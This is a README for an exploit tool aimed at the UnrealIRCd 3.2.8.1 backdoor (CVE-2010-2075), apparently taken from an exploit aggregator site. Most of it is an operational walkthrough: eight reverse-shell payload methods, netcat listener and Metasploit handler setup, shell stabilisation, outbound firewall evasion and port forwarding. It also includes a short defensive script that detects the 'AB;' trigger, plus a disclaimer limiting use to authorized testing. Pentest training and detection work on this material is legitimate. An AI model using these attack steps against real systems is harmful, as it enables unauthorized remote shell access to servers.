## https://sploitus.com/exploit?id=D6DE2329-BFD8-5B97-936E-51147200F1A3
# UnrealIRCD 3.2.8.1 Backdoor Exploit
A clean, flexible exploit for CVE-2010-2075 with multiple payload methods and command-line arguments.
## Quick Start
### Basic Usage
```bash
# Start your listener
nc -lvnp 4444
# Run exploit with method 1 (Bash TCP)
python3 unreal_exploit_final.py -t 192.168.109.120 -l 192.168.45.235 -m 1
```
## Command-Line Arguments
```
Required:
-t, --target Target IP address
-l, --lhost Local IP for reverse shell
Optional:
-p, --port Target port (default: 6667)
-lp, --lport Local port for reverse shell (default: 4444)
-m, --method Exploit method to use (1-8 or "all")
--list-methods List available exploit methods
```
## Available Methods
| Method | Description | Best For |
|--------|-------------|----------|
| 1 | Bash TCP redirect | Modern Linux systems with bash |
| 2 | SH with file descriptors | Systems with limited bash |
| 3 | Netcat with named pipe | Systems without nc -e support |
| 4 | Traditional netcat | Systems with nc -e flag |
| 5 | Base64 encoded payload | Bypassing input filtering |
| 6 | Python reverse shell | Systems with Python installed |
| 7 | Perl reverse shell | Systems with Perl installed |
| 8 | PHP reverse shell | Systems with PHP installed |
| all | Try all methods | When unsure which will work |
## Usage Examples
### List Available Methods
```bash
python3 unreal_exploit_final.py --list-methods
```
### Use Specific Method
```bash
# Method 1 - Bash TCP (recommended first try)
python3 unreal_exploit_final.py -t 192.168.109.120 -l 192.168.45.235 -m 1
# Method 3 - Netcat FIFO (works on most systems)
python3 unreal_exploit_final.py -t 192.168.109.120 -l 192.168.45.235 -m 3
# Method 6 - Python reverse shell
python3 unreal_exploit_final.py -t 192.168.109.120 -l 192.168.45.235 -m 6
```
### Custom Ports
```bash
# Custom target port and listener port
python3 unreal_exploit_final.py -t 192.168.109.120 -p 6667 -l 192.168.45.235 -lp 443 -m 1
```
### Try All Methods
```bash
# Automatically try all methods with 5-second delays
python3 unreal_exploit_final.py -t 192.168.109.120 -l 192.168.45.235 -m all
```
## Complete Attack Flow
### Step 1: Start Listener
```bash
nc -lvnp 4444
```
### Step 2: Run Exploit
```bash
python3 unreal_exploit_final.py -t 192.168.109.120 -l 192.168.45.235 -m 1
```
### Step 3: Interact with Shell
Once connected, you can stabilize the shell:
```bash
# Upgrade to interactive TTY
python -c 'import pty; pty.spawn("/bin/bash")'
# Background with Ctrl+Z, then:
stty raw -echo; fg
# Set terminal type
export TERM=xterm
# Set the SHELL environment variable (this does not change the prompt)
export SHELL=/bin/bash
```
## Troubleshooting
### No Connection Received
**Check Listener**
```bash
# Verify listener is running
netstat -tlnp | grep 4444
```
**Test Network Connectivity**
```bash
# Can target reach you?
# On target (if you have access):
nc -zv YOUR_IP 4444
# Can you reach target?
nc -zv TARGET_IP 6667
```
**Try Different Method**
```bash
# If method 1 fails, try method 3
python3 unreal_exploit_final.py -t 192.168.109.120 -l 192.168.45.235 -m 3
```
**Try All Methods**
```bash
# Let the script try all payloads
python3 unreal_exploit_final.py -t 192.168.109.120 -l 192.168.45.235 -m all
```
### Firewall Issues
**Use Common Ports**
```bash
# Try port 80 or 443 (often allowed outbound)
nc -lvnp 443
python3 unreal_exploit_final.py -t 192.168.109.120 -l 192.168.45.235 -lp 443 -m 1
```
### Wrong IP Address
**Check Your IP**
```bash
# View all interfaces
ip addr show
# Find your active connection IP
ip route get 8.8.8.8 | grep src
```
## Real-World Scenarios
### Scenario 1: Standard Internal Network
```bash
# Target and attacker on same network
nc -lvnp 4444
python3 unreal_exploit_final.py -t 192.168.1.100 -l 192.168.1.50 -m 1
```
### Scenario 2: Through VPN
```bash
# Using VPN interface (tun0)
nc -lvnp 4444
python3 unreal_exploit_final.py -t 10.10.10.5 -l 10.8.0.2 -m 1
```
### Scenario 3: CTF/Lab Environment
```bash
# HTB/THM style box
nc -lvnp 4444
python3 unreal_exploit_final.py -t 10.129.45.120 -l 10.10.14.5 -m 1
```
### Scenario 4: Unsure Which Method Works
```bash
# Try all methods automatically
nc -lvnp 4444
python3 unreal_exploit_final.py -t 192.168.109.120 -l 192.168.45.235 -m all
```
## Advanced Usage
### Using with Metasploit Handler
```bash
# Start Metasploit handler
msfconsole -q
use exploit/multi/handler
set payload cmd/unix/reverse
set LHOST 192.168.45.235
set LPORT 4444
exploit -j
# Run exploit
python3 unreal_exploit_final.py -t 192.168.109.120 -l 192.168.45.235 -m 1
```
### Port Forwarding Scenario
```bash
# If target can't reach you directly, set up port forward
ssh -R 4444:localhost:4444 intermediate_host
# Start listener on your own machine; the reverse forward relays intermediate_host:4444 to it
nc -lvnp 4444
# Use intermediate host IP in exploit
python3 unreal_exploit_final.py -t 192.168.109.120 -l INTERMEDIATE_IP -m 1
```
## Tips for Success
1. **Always start listener BEFORE running exploit**
2. **Use method 1 or 3 as first attempts** (most reliable)
3. **If one method fails, try method 3** (Netcat FIFO works on most systems)
4. **Check your IP is correct** (use `ip addr` or `ifconfig`)
5. **Try common ports** (80, 443, 53) if firewall is blocking
6. **Use "all" methods** if unsure which will work
## Vulnerability Details
- **CVE**: CVE-2010-2075
- **OSVDB**: 65445
- **Affected**: UnrealIRCD 3.2.8.1
- **Backdoor Period**: November 2009 - June 12, 2010
- **Trigger**: Backdoor listens for commands prefixed with "AB;"
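For defenders, the trigger above is also a detection signature. The following is an added example, not part of this tool: it reassembles client-to-server IRC lines per connection and flags any line that starts with `AB;`. It assumes the trigger is matched at the start of a line, as described above; the connection IDs, sample traffic and the `TriggerDetector`/`scan` names are constructed for illustration.

```python
"""Flag the CVE-2010-2075 trigger ("AB;" line prefix) in client-to-server IRC bytes."""
from dataclasses import dataclass, field

TRIGGER = b"AB;"   # prefix named in the Vulnerability Details list
MAX_LINE = 4096    # assumed cap on buffered bytes per connection


@dataclass
class TriggerDetector:
    """Reassembles lines per connection so a trigger split across TCP segments is still seen."""
    buffers: dict = field(default_factory=dict)

    def feed(self, conn_id, chunk):
        """Add bytes sent by one client; return a list of (conn_id, line) alerts."""
        data = self.buffers.get(conn_id, b"") + chunk
        *lines, rest = data.split(b"\n")
        # Keep only the start of an unfinished line: the prefix check needs nothing more.
        self.buffers[conn_id] = rest[:MAX_LINE]
        alerts = []
        for raw in lines:
            line = raw.rstrip(b"\r")
            # Only a line that *starts* with the prefix counts; "AB;" inside a
            # PRIVMSG body is ordinary chat text and must not alert.
            if line.startswith(TRIGGER):
                alerts.append((conn_id, line.decode("latin-1")))
        return alerts


def scan(segments):
    """Run a sequence of (conn_id, bytes) segments through one detector."""
    det = TriggerDetector()
    alerts = []
    for conn_id, chunk in segments:
        alerts.extend(det.feed(conn_id, chunk))
    return alerts


# Constructed sample traffic (not from a real capture); addresses are placeholders.
SAMPLE = [
    ("10.0.0.7:51000", b"NICK alice\r\nUSER alice 0 * :Alice\r\n"),
    ("10.0.0.7:51000", b"PRIVMSG #ops :AB; is just text here\r\n"),
    ("10.0.0.9:40222", b"A"),                          # trigger split across segments
    ("10.0.0.9:40222", b"B;echo constructed-sample\n"),
]

if __name__ == "__main__":
    for conn, line in scan(SAMPLE):
        print(f"ALERT {conn}: {line!r}")
```

No legitimate IRC command begins with `AB;`, so any alert on traffic to an IRC port warrants checking whether the server is the affected 3.2.8.1 build.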
## Legal Disclaimer
**FOR AUTHORIZED TESTING ONLY**
This tool is for educational purposes and authorized penetration testing only. Unauthorized access to computer systems is illegal. Always obtain explicit written permission before testing.
## References
- [CVE-2010-2075](https://vulners.com/cve/CVE-2010-2075)
- [Unreal Security Advisory](http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt)
- [Metasploit Module](https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor/)